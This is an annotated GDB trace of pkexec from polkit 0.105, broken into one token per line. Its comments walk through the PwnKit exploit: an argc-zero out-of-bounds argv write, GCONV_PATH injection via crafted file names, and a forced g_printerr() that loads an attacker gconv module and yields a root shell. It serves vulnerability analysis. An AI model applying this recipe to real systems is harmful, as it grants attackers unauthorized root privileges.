Breakpoint
1
, main (argc
=
0
, argv
=
0x7ffe2d2d4e58
) at pkexec.c:
406
406
const gchar
*
environment_variables_to_save[]
=
{
Breakpoint
2
at
0x55d64339bed6
:
file
pkexec.c, line
900.
Stepping until end of main @ pkexec.c:
386
442
ret
=
127
;
443
authority
=
NULL;
444
subject
=
NULL;
445
details
=
NULL;
446
result
=
NULL;
447
action_id
=
NULL;
448
saved_env
=
NULL;
449
path
=
NULL;
450
command_line
=
NULL;
451
opt_user
=
NULL;
452
local_agent_handle
=
NULL;
455
if
(geteuid () !
=
0
)
461
original_user_name
=
g_strdup (g_get_user_name ());
462
if
(original_user_name
=
=
NULL)
468
if
(getcwd (original_cwd, sizeof (original_cwd))
=
=
NULL)
478
opt_show_help
=
FALSE;
479
opt_show_version
=
FALSE;
480
opt_disable_internal_agent
=
FALSE;
481
for
(n
=
1
; n < (guint) argc; n
+
+
)
// argc == 0 in this run (see the breakpoint above), so the loop condition n < argc is false on entry, the body never executes and n stays at 1. An empty argv is the root cause here: the fix is to reject argc < 1 before this loop is ever reached.
512
if
(opt_show_help)
518
else
if
(opt_show_version)
525
if
(opt_user
=
=
NULL)
-
-
Type
<RET>
for
more, q to quit, c to
continue
without paging
-
-
526
opt_user
=
g_strdup (
"root"
);
536
g_assert (argv[argc]
=
=
NULL);
537
path
=
g_strdup (argv[n]);
// Out-of-bounds read: argv[n] is argv[1], but with argc == 0 the array holds only the terminating NULL at argv[0] (which is why the g_assert above passes). argv[1] therefore aliases environ[0], which the exploit set to "pwnkit.so:.", so path is now attacker-controlled.
538
if
(path
=
=
NULL)
543
if
(path[
0
] !
=
'/'
)
546
s
=
g_find_program_in_path (path);
// path is not absolute (the '/' check at 543), so g_find_program_in_path() searches PATH for "pwnkit.so:." and returns the resolved location in s. The exploit sets PATH to "GCONV_PATH=." and has created a directory literally named "GCONV_PATH=." containing a file named "pwnkit.so:.", so the lookup succeeds and s becomes "GCONV_PATH=./pwnkit.so:.".
547
if
(s
=
=
NULL)
552
g_free (path);
553
argv[n]
=
path
=
s;
// Out-of-bounds write: argv[1] is set to "GCONV_PATH=./pwnkit.so:.", i.e. environ[0] is overwritten. This re-injects GCONV_PATH, an unsafe variable that pkexec is supposed to keep out of the environment, and is the crucial step of the exploit. From here on all that is needed is to force any error path that ends up calling g_printerr().
555
if
(access (path, F_OK) !
=
0
)
560
command_line
=
g_strjoinv (
" "
, argv
+
n);
561
exec_argv
=
argv
+
n;
566
rc
=
getpwnam_r (opt_user, &pwstruct, pwbuf, sizeof pwbuf, &pw);
567
if
(rc
=
=
0
&& pw
=
=
NULL)
572
else
if
(pw
=
=
NULL)
579
saved_env
=
g_ptr_array_new ();
580
for
(n
=
0
; environment_variables_to_save[n] !
=
NULL; n
+
+
)
582
const gchar
*
key
=
environment_variables_to_save[n];
585
value
=
g_getenv (key);
586
if
(value
=
=
NULL)
593
if
(!validate_environment_variable (key, value))
// Here key == "SHELL" and value == "/lol/i/do/not/exists" (set by the exploit). validate_environment_variable() rejects it with "The value for the SHELL variable was not found the /etc/shells file" and reports the error through g_printerr(). That call performs a charset conversion which (via glibc iconv) consults the GCONV_PATH injected above, so the attacker's pwnkit.so is loaded as a gconv module; its initializer runs execve("/bin/sh", args, environ) and yields the shell seen below (/usr/bin/dash), inheriting pkexec's privileges (the geteuid() check at 455 guarantees euid 0).
process
11852
is
executing new program:
/
usr
/
bin
/
dash
Error
in
re
-
setting breakpoint
1
: Function
"main"
not
defined.
Error
in
re
-
setting breakpoint
2
: No source
file
named
/
home
/
kali
/
software
/
release
/
polkit
-
0.105
/
src
/
programs
/
pkexec.c.